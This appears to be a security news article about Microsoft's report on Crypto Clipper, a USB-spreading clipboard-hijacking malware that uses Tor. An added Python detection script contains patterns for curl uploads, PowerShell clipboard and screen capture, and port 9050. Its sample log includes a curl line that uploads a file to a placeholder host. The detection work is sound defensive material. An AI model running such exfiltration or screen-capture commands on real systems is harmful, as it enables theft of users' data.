Microsoft says it has spotted a new self-spreading threat called Crypto Clipper, and this one goes after crypto users in a rather ugly way: it moves through USB drives, watches the clipboard for wallet data, and can swap out recipient addresses before a transfer goes through. The twist is that it avoids the usual command-and-control setup, leaning instead on a local Tor client and SOCKS5 proxy traffic to hide where orders and stolen data are coming from.
That combination makes the malware more annoying than a basic clipper and more flexible than a simple USB worm. In other words, it is built to spread, steal, and stay hard to trace – a tidy little trifecta for attackers and a headache for everyone else.
How the USB infection starts
The infection chain begins with .lnk shortcut files on USB drives. Once an infected device is plugged in, the malicious code checks whether its own component is already present; if not, it pulls it in through the hidden Tor-based channel. Microsoft says the setup is designed to reduce visibility and make source tracking much harder than in a conventional malware campaign.
This is the part that should make security teams pay attention beyond the crypto angle. USB-borne malware is old-school, but pairing it with anonymity tooling is a smarter, nastier update that borrows from both worm-style spread and modern stealth tactics.
Clipboard theft and address swapping
Once inside a system, Crypto Clipper monitors the clipboard for strings that resemble crypto addresses or seed phrases made up of 12 or 24 words. If it finds them, it grabs the data and sends it away. It also takes five screenshots in 10 seconds, apparently to capture whatever the victim is doing at the time.
- Targets crypto addresses and seed phrases
- Can replace copied addresses with attacker-controlled wallets
- Takes five screenshots in 10 seconds
That address-swapping trick is the real sting in the tail. It does not need to drain a wallet directly if it can quietly redirect the payment at the moment of copy and paste – a classic clipper move, just dressed up with better evasion.
Microsoft Defender detection clues
Microsoft Defender identifies the components as suspicious JavaScript processes and potential data exfiltration through curl, while the antivirus labels the threat as Trojan:Win32/CryptoBandits.A. Microsoft also points to indirect signs of infection, including child processes launched by script interpreters, local proxy activity on port 9050, screen-capture attempts via PowerShell, and clipboard analysis or address-replacement behavior.
That detection profile suggests defenders may have to look for behavior, not just filenames. The malware can hide behind routine scripting tools and normal-looking USB file names, which is exactly how these things keep slipping through the cracks.
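The indirect signs Microsoft lists above can be turned into a small behavioral triage rule set. The following is an added example, not Microsoft's or Defender's detection logic. It assumes a JSON-lines process and network telemetry format constructed for this illustration, and the PowerShell keyword lists used to spot screen-capture and clipboard activity are assumed heuristics rather than anything the article specifies; the port 9050, curl, and script-interpreter child-process indicators come straight from the text.

```python
import json
from typing import Dict, List, Tuple

# Script interpreters whose child processes the article names as an indirect sign of infection.
SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe", "node.exe", "powershell.exe", "pwsh.exe"}

# Tor's default SOCKS port, named in the article as a local-proxy indicator.
TOR_SOCKS_PORT = 9050

# curl options that send a request body or file; a hit means "potential data exfiltration through curl".
CURL_UPLOAD_FLAGS = {"-d", "--data", "--data-binary", "--data-raw", "-F", "--form", "-T", "--upload-file"}

# Assumed keyword heuristics (not from the article) for PowerShell one-liners that
# capture the screen or read/write the clipboard.
SCREEN_CAPTURE_HINTS = ("copyfromscreen", "system.drawing", "printscreen")
CLIPBOARD_HINTS = ("get-clipboard", "set-clipboard", "windows.forms.clipboard")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(event: Dict) -> List[str]:
    """Return the name of every indicator that matches a single telemetry event."""
    hits: List[str] = []
    if event.get("type") == "process":
        parent = _basename(event.get("parent_image", ""))
        image = _basename(event.get("image", ""))
        cmd = event.get("command_line", "")
        if parent in SCRIPT_INTERPRETERS:
            hits.append("script_interpreter_child")
        if image == "curl.exe" and any(tok in CURL_UPLOAD_FLAGS for tok in cmd.split()):
            hits.append("curl_data_upload")
        if image in ("powershell.exe", "pwsh.exe"):
            lowered = cmd.lower()
            if any(h in lowered for h in SCREEN_CAPTURE_HINTS):
                hits.append("powershell_screen_capture")
            if any(h in lowered for h in CLIPBOARD_HINTS):
                hits.append("powershell_clipboard_access")
    elif event.get("type") == "network":
        if event.get("dest_ip") in ("127.0.0.1", "::1") and event.get("dest_port") == TOR_SOCKS_PORT:
            hits.append("local_tor_socks_proxy")
    return hits


def scan_log(lines) -> List[Tuple[str, int, str]]:
    """Run check_event over JSON lines; return (host, pid, indicator) triples."""
    findings = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        event = json.loads(raw)
        for indicator in check_event(event):
            findings.append((event.get("host", "?"), event.get("pid"), indicator))
    return findings


def summarize(findings) -> Dict[str, int]:
    """Count findings per indicator so an analyst can see which behaviors co-occur on a host."""
    counts: Dict[str, int] = {}
    for _host, _pid, indicator in findings:
        counts[indicator] = counts.get(indicator, 0) + 1
    return counts


# Constructed sample telemetry (not real captures): a USB shortcut launching a script host,
# the script host spawning cmd, curl and PowerShell, a loopback connection to 9050, and two benign events.
SAMPLE_LOG = r"""
{"host":"ws01","type":"process","pid":4120,"parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\wscript.exe","command_line":"wscript.exe E:\\Photos.lnk"}
{"host":"ws01","type":"process","pid":4188,"parent_image":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe /c dir E:\\"}
{"host":"ws01","type":"process","pid":4201,"parent_image":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Windows\\System32\\curl.exe","command_line":"curl.exe --data-binary @out.bin http://placeholder.invalid/"}
{"host":"ws01","type":"network","pid":4201,"dest_ip":"127.0.0.1","dest_port":9050}
{"host":"ws01","type":"process","pid":4230,"parent_image":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -c Add-Type -AssemblyName System.Drawing; $g.CopyFromScreen(0,0,0,0,$b.Size)"}
{"host":"ws01","type":"network","pid":1502,"dest_ip":"10.0.0.5","dest_port":443}
{"host":"ws01","type":"process","pid":1610,"parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -c Get-Process"}
"""


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG.splitlines())
    for host, pid, indicator in results:
        print(f"{host} pid={pid} {indicator}")
    print(summarize(results))
```

No single rule here is conclusive on its own: a PowerShell process reading the clipboard, or a developer's curl upload, is routine. The value is in correlation, which is why the summary is keyed by indicator and the findings carry the host and pid, so that a script host that spawns curl, talks to loopback 9050 and captures the screen within the same session stands out from any one of those events alone.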
Crypto Clipper threat profile
Crypto theft malware is hardly new, but this one folds several techniques into a single package: clipboard hijacking, screen capture, remote command execution, and anonymous transport. That mix makes it closer to spyware with a payment redirect button than a one-trick clipper. For crypto holders, the lesson is boring but brutal: if a wallet address was copied from a compromised machine, it should not be trusted on faith.
Expect defenders to keep seeing more of this hybrid style of malware. The low cost of USB spread, plus anonymity layers that blur attribution, is a neat fit for criminals who want reach without running noisy infrastructure. That is not a great combination for anyone storing seed phrases near a Windows box.